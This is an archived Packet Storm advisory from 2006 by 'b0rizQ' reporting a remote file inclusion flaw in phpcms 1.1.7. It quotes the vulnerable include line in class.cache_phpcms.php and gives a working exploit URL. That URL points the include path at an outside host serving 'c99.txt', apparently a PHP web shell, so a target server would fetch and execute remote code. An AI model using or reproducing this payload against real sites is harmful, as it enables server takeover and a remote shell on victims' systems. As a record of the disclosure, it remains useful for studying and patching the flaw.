phpcms117-rfi.txt

2006-12-28T00:00:00
ID PACKETSTORM:53284
Type packetstorm
Reporter b0rizQ
Modified 2006-12-28T00:00:00

Description

                                        
                                            `#phpcms <=- 1.1.7 Remote File Inclusion  
#Download Source : #http://phpcms.de/files/phpcms_1_1_7.zip  
#Found By : b0rizQ  
#Greetz : Nuck3r + Crack_Man + Red_Casper + RaChidox + Broken-Proxy + S4mi  
  
_____________________________________________________  
  
File : class.cache_phpcms.php  
--Bugs--------------------------------------  
include ($PHPCMS_INCLUDEPATH.'/language.'.$DEFAULTS->LANGUAGE );  
if ( $DEFAULTS->STATS == 'on' )  
  
  
--------------------------------------------  
Exmple And Methode Exploit :   
  
http://www.traget.***/cms/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=http://b0rizq.by.ru/c99.txt?  
  
  
""""""""""www.b0rizQ.Biz"""""""""""""""""""""  
`